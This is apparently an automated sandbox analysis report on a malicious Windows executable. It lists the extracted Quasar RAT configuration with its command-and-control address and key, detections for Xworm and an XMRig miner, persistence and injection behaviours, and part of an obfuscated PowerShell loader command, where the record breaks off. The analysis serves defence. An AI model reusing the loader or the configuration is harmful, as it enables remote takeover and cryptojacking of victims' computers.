Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20250502-en -
resource tags
arch:x64arch:x86image:win11-20250502-enlocale:en-usos:windows11-21h2-x64system -
submitted
03/05/2025, 16:15
Static task
static1
Behavioral task
behavioral1
Sample
primate protocol.exe
Resource
win10v2004-20250502-en
Behavioral task
behavioral2
Sample
primate protocol.exe
Resource
win11-20250502-en
General
-
Target
primate protocol.exe
-
Size
4.7MB
-
MD5
28fccc4c460bbe5df088d182c156531c
-
SHA1
0e4ff4e76b430ae326ff14d4e0e304b38497a9ab
-
SHA256
fdcf99d6435929609f8d5625e4d24357bdc3949d9336901fa0daa7c494284a75
-
SHA512
49f8d5feb07aff5efc0d592cd7886e7da3a7a6069f64b8332d0696c2860b5376c34d8825fa6f3c8a6f5590de803b1e840cc41605d24199c9890e0d23d2f4fca8
-
SSDEEP
49152:SmQvdtV2bnS7TKxxXf4cFefFbAbsW4H94VPxfAcGDtpZ4Bl6nQWPvkO8oiTa8qd+:SZtV2SsfHeW4HmVPG7RYBlUPvbAEba
Malware Config
Extracted
quasar
1.6.0
client
174.61.118.194:4872
eab25b68-ae09-4c5c-b42f-516771913f6f
-
encryption_key
4ECD6F0D7A0CD0888AC4DF40F22ECF5C3E76855B
-
install_name
sysprochost.exe
-
key_salt
5a23f8394640cb9e40658446a04c0bbae82dc93d0470e1b2a406a90fd2520382
-
log_directory
ok
-
reconnect_delay
3000
-
startup_key
HOST
Signatures
-
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral2/files/0x001900000002b052-31.dat family_xworm behavioral2/memory/3076-32-0x0000000000F10000-0x0000000000F7A000-memory.dmp family_xworm behavioral2/memory/5608-899-0x0000000000820000-0x000000000088A000-memory.dmp family_xworm behavioral2/memory/5208-922-0x0000000000180000-0x00000000001EA000-memory.dmp family_xworm -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/files/0x001a00000002b050-4.dat family_quasar behavioral2/memory/5768-29-0x0000018E2D8D0000-0x0000018E2DA62000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 5316 created 632 5316 powershell.EXE 5 PID 908 created 632 908 powershell.EXE 5 -
Xmrig family
-
Xworm family
-
XMRig Miner payload 7 IoCs
resource yara_rule behavioral2/memory/2336-154-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/2336-160-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/2336-159-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/2336-158-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/2336-157-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/2336-156-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral2/memory/2336-153-0x0000000140000000-0x0000000140835000-memory.dmp xmrig -
pid Process 5316 powershell.EXE 908 powershell.EXE 5664 powershell.exe -
Creates new service(s) 2 TTPs
-
Stops running service(s) 4 TTPs
-
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe CompPkg.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe CompPkg.exe -
Executes dropped EXE 7 IoCs
pid Process 5768 systemprocess.exe 3016 host.exe 3076 CompPkg.exe 5776 CompPkg.exe 1480 ijujdfuujtjk.exe 5608 CompPkg.exe 5208 CompPkg.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Microsoft\Windows\CurrentVersion\Run\CompPkg = "C:\\Users\\Admin\\AppData\\Roaming\\CompPkg.exe" CompPkg.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 3016 set thread context of 848 3016 host.exe 112 PID 1480 set thread context of 5008 1480 ijujdfuujtjk.exe 134 PID 1480 set thread context of 5268 1480 ijujdfuujtjk.exe 135 PID 1480 set thread context of 2336 1480 ijujdfuujtjk.exe 136 PID 5316 set thread context of 4636 5316 powershell.EXE 139 PID 908 set thread context of 4396 908 powershell.EXE 140 -
resource yara_rule behavioral2/memory/2336-154-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/2336-160-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/2336-159-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/2336-158-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/2336-157-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/2336-156-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/2336-153-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/2336-152-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/2336-151-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/2336-148-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/2336-150-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral2/memory/2336-147-0x0000000140000000-0x0000000140835000-memory.dmp upx -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\CompPkg.exe primate protocol.exe File created C:\Windows\systemprocess.exe primate protocol.exe File created C:\Windows\host.exe primate protocol.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1512 sc.exe 896 sc.exe 1764 sc.exe 1992 sc.exe 2332 sc.exe 5740 sc.exe 4456 sc.exe 3200 sc.exe 6088 sc.exe 1560 sc.exe 1628 sc.exe 3408 sc.exe 5820 sc.exe 4848 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language primate protocol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3128 netsh.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1746289067" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3340 schtasks.exe 4768 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5768 systemprocess.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1444 powershell.exe 2660 powershell.exe 1444 powershell.exe 2660 powershell.exe 5768 systemprocess.exe 5664 powershell.exe 5664 powershell.exe 3016 host.exe 3016 host.exe 3016 host.exe 3016 host.exe 3016 host.exe 3016 host.exe 3016 host.exe 3016 host.exe 3016 host.exe 3016 host.exe 1480 ijujdfuujtjk.exe 1480 ijujdfuujtjk.exe 1480 ijujdfuujtjk.exe 1480 ijujdfuujtjk.exe 5316 powershell.EXE 5316 powershell.EXE 1480 ijujdfuujtjk.exe 1480 ijujdfuujtjk.exe 1480 ijujdfuujtjk.exe 1480 ijujdfuujtjk.exe 908 powershell.EXE 908 powershell.EXE 2336 dialer.exe 2336 dialer.exe 5316 powershell.EXE 908 powershell.EXE 4396 dllhost.exe 4396 dllhost.exe 4636 dllhost.exe 4636 dllhost.exe 4396 dllhost.exe 4396 dllhost.exe 2336 dialer.exe 2336 dialer.exe 4396 dllhost.exe 4396 dllhost.exe 5768 systemprocess.exe 4396 dllhost.exe 4396 dllhost.exe 4396 dllhost.exe 4396 dllhost.exe 4396 dllhost.exe 4396 dllhost.exe 4396 dllhost.exe 4396 dllhost.exe 4396 dllhost.exe 4396 dllhost.exe 2336 dialer.exe 5768 systemprocess.exe 2336 dialer.exe 4396 dllhost.exe 4396 dllhost.exe 4396 dllhost.exe 4396 dllhost.exe 4396 dllhost.exe 4396 dllhost.exe 4396 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3176 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5768 systemprocess.exe Token: SeDebugPrivilege 3076 CompPkg.exe Token: SeDebugPrivilege 2660 powershell.exe Token: SeDebugPrivilege 1444 powershell.exe Token: SeDebugPrivilege 5776 CompPkg.exe Token: SeDebugPrivilege 5664 powershell.exe Token: SeDebugPrivilege 3016 host.exe Token: SeDebugPrivilege 5316 powershell.EXE Token: SeDebugPrivilege 1480 ijujdfuujtjk.exe Token: SeLockMemoryPrivilege 2336 dialer.exe Token: SeDebugPrivilege 908 powershell.EXE Token: SeDebugPrivilege 5316 powershell.EXE Token: SeDebugPrivilege 908 powershell.EXE Token: SeDebugPrivilege 4396 dllhost.exe Token: SeDebugPrivilege 4636 dllhost.exe Token: SeShutdownPrivilege 3176 Explorer.EXE Token: SeCreatePagefilePrivilege 3176 Explorer.EXE Token: SeShutdownPrivilege 3176 Explorer.EXE Token: SeCreatePagefilePrivilege 3176 Explorer.EXE Token: SeShutdownPrivilege 3176 Explorer.EXE Token: SeCreatePagefilePrivilege 3176 Explorer.EXE Token: SeShutdownPrivilege 3176 Explorer.EXE Token: SeCreatePagefilePrivilege 3176 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2700 svchost.exe Token: SeIncreaseQuotaPrivilege 2700 svchost.exe Token: SeSecurityPrivilege 2700 svchost.exe Token: SeTakeOwnershipPrivilege 2700 svchost.exe Token: SeLoadDriverPrivilege 2700 svchost.exe Token: SeSystemtimePrivilege 2700 svchost.exe Token: SeBackupPrivilege 2700 svchost.exe Token: SeRestorePrivilege 2700 svchost.exe Token: SeShutdownPrivilege 2700 svchost.exe Token: SeSystemEnvironmentPrivilege 2700 svchost.exe Token: SeUndockPrivilege 2700 svchost.exe Token: SeManageVolumePrivilege 2700 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2700 svchost.exe Token: SeIncreaseQuotaPrivilege 2700 svchost.exe Token: SeSecurityPrivilege 2700 svchost.exe Token: SeTakeOwnershipPrivilege 2700 svchost.exe Token: SeLoadDriverPrivilege 2700 svchost.exe Token: SeSystemtimePrivilege 2700 svchost.exe Token: SeBackupPrivilege 2700 svchost.exe Token: SeRestorePrivilege 2700 svchost.exe Token: SeShutdownPrivilege 2700 svchost.exe Token: SeSystemEnvironmentPrivilege 2700 svchost.exe Token: SeUndockPrivilege 2700 svchost.exe Token: SeManageVolumePrivilege 2700 svchost.exe Token: SeDebugPrivilege 2248 wmiprvse.exe Token: SeAuditPrivilege 2220 svchost.exe Token: SeAuditPrivilege 2708 svchost.exe Token: SeAuditPrivilege 2708 svchost.exe Token: SeShutdownPrivilege 3176 Explorer.EXE Token: SeCreatePagefilePrivilege 3176 Explorer.EXE Token: SeShutdownPrivilege 3176 Explorer.EXE Token: SeCreatePagefilePrivilege 3176 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2700 svchost.exe Token: SeIncreaseQuotaPrivilege 2700 svchost.exe Token: SeSecurityPrivilege 2700 svchost.exe Token: SeTakeOwnershipPrivilege 2700 svchost.exe Token: SeLoadDriverPrivilege 2700 svchost.exe Token: SeSystemtimePrivilege 2700 svchost.exe Token: SeBackupPrivilege 2700 svchost.exe Token: SeRestorePrivilege 2700 svchost.exe Token: SeShutdownPrivilege 2700 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5768 systemprocess.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1484 wrote to memory of 2660 1484 primate protocol.exe 82 PID 1484 wrote to memory of 2660 1484 primate protocol.exe 82 PID 1484 wrote to memory of 2660 1484 primate protocol.exe 82 PID 1484 wrote to memory of 1444 1484 primate protocol.exe 84 PID 1484 wrote to memory of 1444 1484 primate protocol.exe 84 PID 1484 wrote to memory of 1444 1484 primate protocol.exe 84 PID 1484 wrote to memory of 5768 1484 primate protocol.exe 86 PID 1484 wrote to memory of 5768 1484 primate protocol.exe 86 PID 1484 wrote to memory of 3016 1484 primate protocol.exe 87 PID 1484 wrote to memory of 3016 1484 primate protocol.exe 87 PID 1484 wrote to memory of 3076 1484 primate protocol.exe 88 PID 1484 wrote to memory of 3076 1484 primate protocol.exe 88 PID 5768 wrote to memory of 3340 5768 systemprocess.exe 89 PID 5768 wrote to memory of 3340 5768 systemprocess.exe 89 PID 3076 wrote to memory of 4768 3076 CompPkg.exe 91 PID 3076 wrote to memory of 4768 3076 CompPkg.exe 91 PID 5156 wrote to memory of 5776 5156 cmd.exe 95 PID 5156 wrote to memory of 5776 5156 cmd.exe 95 PID 5768 wrote to memory of 3128 5768 systemprocess.exe 98 PID 5768 wrote to memory of 3128 5768 systemprocess.exe 98 PID 5768 wrote to memory of 5664 5768 systemprocess.exe 100 PID 5768 wrote to memory of 5664 5768 systemprocess.exe 100 PID 3016 wrote to memory of 848 3016 host.exe 112 PID 3016 wrote to memory of 848 3016 host.exe 112 PID 3016 wrote to memory of 848 3016 host.exe 112 PID 3016 wrote to memory of 848 3016 host.exe 112 PID 3016 wrote to memory of 848 3016 host.exe 112 PID 3016 wrote to memory of 848 3016 host.exe 112 PID 1480 wrote to memory of 5008 1480 ijujdfuujtjk.exe 134 PID 1480 wrote to memory of 5008 1480 ijujdfuujtjk.exe 134 PID 1480 wrote to memory of 5008 1480 ijujdfuujtjk.exe 134 PID 1480 wrote to memory of 5008 1480 ijujdfuujtjk.exe 134 PID 1480 wrote to memory of 5008 1480 ijujdfuujtjk.exe 134 PID 1480 wrote to memory of 5008 1480 ijujdfuujtjk.exe 134 PID 1480 wrote to memory of 5268 1480 ijujdfuujtjk.exe 135 PID 1480 wrote to memory of 5268 1480 ijujdfuujtjk.exe 135 PID 1480 wrote to memory of 5268 1480 ijujdfuujtjk.exe 135 PID 1480 wrote to memory of 5268 1480 ijujdfuujtjk.exe 135 PID 1480 wrote to memory of 5268 1480 ijujdfuujtjk.exe 135 PID 1480 wrote to memory of 5268 1480 ijujdfuujtjk.exe 135 PID 1480 wrote to memory of 5268 1480 ijujdfuujtjk.exe 135 PID 1480 wrote to memory of 5268 1480 ijujdfuujtjk.exe 135 PID 1480 wrote to memory of 5268 1480 ijujdfuujtjk.exe 135 PID 1480 wrote to memory of 2336 1480 ijujdfuujtjk.exe 136 PID 1480 wrote to memory of 2336 1480 ijujdfuujtjk.exe 136 PID 1480 wrote to memory of 2336 1480 ijujdfuujtjk.exe 136 PID 1480 wrote to memory of 2336 1480 ijujdfuujtjk.exe 136 PID 1480 wrote to memory of 2336 1480 ijujdfuujtjk.exe 136 PID 5316 wrote to memory of 4636 5316 powershell.EXE 139 PID 5316 wrote to memory of 4636 5316 powershell.EXE 139 PID 5316 wrote to memory of 4636 5316 powershell.EXE 139 PID 5316 wrote to memory of 4636 5316 powershell.EXE 139 PID 5316 wrote to memory of 4636 5316 powershell.EXE 139 PID 5316 wrote to memory of 4636 5316 powershell.EXE 139 PID 5316 wrote to memory of 4636 5316 powershell.EXE 139 PID 5316 wrote to memory of 4636 5316 powershell.EXE 139 PID 908 wrote to memory of 4396 908 powershell.EXE 140 PID 908 wrote to memory of 4396 908 powershell.EXE 140 PID 908 wrote to memory of 4396 908 powershell.EXE 140 PID 908 wrote to memory of 4396 908 powershell.EXE 140 PID 908 wrote to memory of 4396 908 powershell.EXE 140 PID 908 wrote to memory of 4396 908 powershell.EXE 140 PID 908 wrote to memory of 4396 908 powershell.EXE 140 PID 908 wrote to memory of 4396 908 powershell.EXE 140 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:632
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:460
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{09f4a227-cef4-4b5d-ba7b-580721731d4e}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4636
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c3f2fd93-4d00-463c-bd0a-7536c6c18483}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4396
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:992
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1068
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1156
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rWNoSHwYnwkI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qNbyexdlHPgKWO,[Parameter(Position=1)][Type]$pGJLtrOUxb)$PTQAtKeJiqS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+'c'+''+'t'+'e'+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+'e'+'m'+''+[Char](111)+'r'+'y'+'M'+'o'+''+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+'ate'+'T'+'y'+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+'s'+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+''+'e'+'a'+[Char](108)+''+'e'+''+'d'+''+[Char](44)+'An'+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+'A'+[Char](117)+''+[Char](116)+'o'+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$PTQAtKeJiqS.DefineConstructor(''+[Char](82)+'T'+[Char](83)+'p'+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$qNbyexdlHPgKWO).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+'m'+'e'+[Char](44)+''+'M'+''+[Char](97)+'na'+'g'+''+[Char](101)+'d');$PTQAtKeJiqS.DefineMethod('I'+'n'+''+[Char](118)+''+[Char](111)+'k'+'e'+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'H'+'i'+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+'e'+''+'w'+''+[Char](83)+'l'+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$pGJLtrOUxb,$qNbyexdlHPgKWO).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $PTQAtKeJiqS.CreateType();}$uCYewRMsqHnJv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 